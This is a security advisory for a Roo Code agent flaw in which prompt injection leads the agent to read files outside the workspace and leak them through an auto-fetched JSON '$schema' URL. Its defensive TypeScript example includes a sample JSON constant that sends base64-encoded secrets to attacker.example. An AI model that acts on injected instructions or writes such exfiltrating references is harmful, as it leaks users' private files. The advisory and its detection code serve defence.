PT-2025-27259 · Roo Code +1

Maccarita · Published 2025-06-27 · Updated 2025-09-15 · CVE-2025-53097 · CVSS v3.1 7.5 High
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: Roo Code versions prior to 3.20.3
Description: The Roo Code agent's search files tool did not honor the setting that restricts file reads to the open VS Code workspace. An attacker who could inject a prompt into the agent could therefore have it read a sensitive file outside the workspace and write the contents into a JSON schema reference (for example the "$schema" URL of a JSON file) that points at a host the attacker controls. VS Code fetches referenced schemas automatically by default, so writing that reference triggers an outbound request, and thus the exfiltration, without any user interaction. The issue is described as moderate severity because the attacker must already be able to submit prompts to the agent; the CVSS v3.1 vector above (network, no privileges, no user interaction, high confidentiality impact only) scores 7.5 High because the base metrics do not capture that precondition.
Recommendations: Update Roo Code to version 3.20.3 or later, where the search files tool respects the workspace restriction. Until the update is applied, disable the search files tool in the agent, or turn off automatic schema downloading in VS Code (the json.schemaDownload.enable setting) so that a planted schema reference cannot open a network connection on its own. Treat any content the agent reads as a possible prompt-injection vector, since that is the only precondition this issue requires.
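As an added example (not code from Roo Code or VS Code), the following TypeScript shows the two checks this advisory implies: the workspace-containment check that the vulnerable search tool skipped, including the symlink and "..", cases a naive prefix comparison misses, and a scan for the exfiltration channel, i.e. "$schema" URLs in JSON files that VS Code would fetch from a non-allowlisted host. The function names, the allowlisted host, the temporary workspace layout and the sample JSON are assumptions constructed for illustration.

```typescript
// Added example, not code from Roo Code or VS Code. Function names, the
// schemastore allowlist entry, the demo workspace and the sample JSON are
// assumptions made for illustration.
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

/** Resolve symlinks when the path exists; otherwise fall back to the lexical absolute form. */
function canonicalize(p: string): string {
  const abs = path.resolve(p);
  try {
    return fs.realpathSync(abs);
  } catch {
    return abs; // not created yet (or unreadable): the lexical form is the best we have
  }
}

/**
 * The containment check the vulnerable search tool skipped: a candidate path is
 * acceptable only when it resolves to the workspace root itself or somewhere
 * beneath it. Covers "..", absolute paths, symlinks that point outside the tree,
 * and the "/ws2" vs "/ws" trap that a plain string-prefix comparison falls into.
 */
export function isInsideWorkspace(workspaceRoot: string, candidate: string): boolean {
  const root = canonicalize(workspaceRoot);
  const target = canonicalize(path.isAbsolute(candidate) ? candidate : path.join(root, candidate));
  const rel = path.relative(root, target);
  if (rel === "") return true;             // the root directory itself
  if (path.isAbsolute(rel)) return false;  // different drive or filesystem root
  return rel !== ".." && !rel.startsWith(".." + path.sep);
}

/** Build a throwaway workspace with one symlink escaping it and exercise the check. */
export function demoWorkspaceCheck(): Record<string, boolean> {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), "ws-check-"));
  const root = path.join(base, "workspace");
  const outside = path.join(base, "outside.txt"); // sibling of the workspace, not inside it
  fs.mkdirSync(path.join(root, "src"), { recursive: true });
  fs.writeFileSync(path.join(root, "src", "a.json"), "{}");
  fs.writeFileSync(outside, "secret");
  fs.symlinkSync(outside, path.join(root, "link")); // symlink inside the tree, target outside
  try {
    return {
      inside: isInsideWorkspace(root, "src/a.json"),
      missingInside: isInsideWorkspace(root, "src/not-yet-created.json"),
      dotdot: isInsideWorkspace(root, "../outside.txt"),
      absolute: isInsideWorkspace(root, "/etc/passwd"),
      prefixTrap: isInsideWorkspace(root, root + "2" + path.sep + "file"),
      symlinkOut: isInsideWorkspace(root, "link"),
    };
  } finally {
    fs.rmSync(base, { recursive: true, force: true });
  }
}

/**
 * The exfiltration channel from the advisory: VS Code fetches "$schema" URLs on
 * its own. Walk a parsed JSON document and return every http(s) "$schema" value
 * whose host is not on the allowlist. Relative references are not network fetches.
 */
export function findUntrustedSchemaRefs(jsonText: string, allowedHosts: string[]): string[] {
  const hits: string[] = [];
  const walk = (node: unknown): void => {
    if (Array.isArray(node)) {
      node.forEach((item) => walk(item));
      return;
    }
    if (node === null || typeof node !== "object") return;
    for (const [key, value] of Object.entries(node as Record<string, unknown>)) {
      if (key === "$schema" && typeof value === "string") {
        try {
          const u = new URL(value);
          const remote = u.protocol === "http:" || u.protocol === "https:";
          if (remote && !allowedHosts.includes(u.hostname)) hits.push(value);
        } catch {
          // relative or malformed reference: resolved locally, nothing is fetched
        }
      } else {
        walk(value);
      }
    }
  };
  walk(JSON.parse(jsonText));
  return hits;
}

/** Workaround check: true unless settings.json (plain JSON assumed) turns schema downloads off. */
export function schemaDownloadEnabled(settingsText: string): boolean {
  const settings = JSON.parse(settingsText) as Record<string, unknown>;
  return settings["json.schemaDownload.enable"] !== false;
}

// Constructed sample: a JSON file of the shape an injected prompt could make the
// agent write, smuggling stolen file contents in the query string of the schema URL.
export const SAMPLE_EXFIL_JSON = JSON.stringify({
  $schema: "https://attacker.example/schema.json?d=" + Buffer.from("secret=hunter2").toString("base64"),
  name: "harmless-looking-config",
});
```

The containment check canonicalizes both the root and the candidate through realpath when they exist, so a symlink planted inside the workspace cannot be used to read outside it, while paths that do not exist yet (a file the agent is about to create) are judged lexically. The schema scan flags only http and https references, since those are the ones that leave the machine; an allowlist of known schema hosts keeps legitimate references quiet.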

Exploit · Fix · LPE · Special Elements Injection

Weakness Enumeration

Related Identifiers

CVE-2025-53097
GHSA-wr2q-46pg-f228

Affected Products

Roo Code
VS Code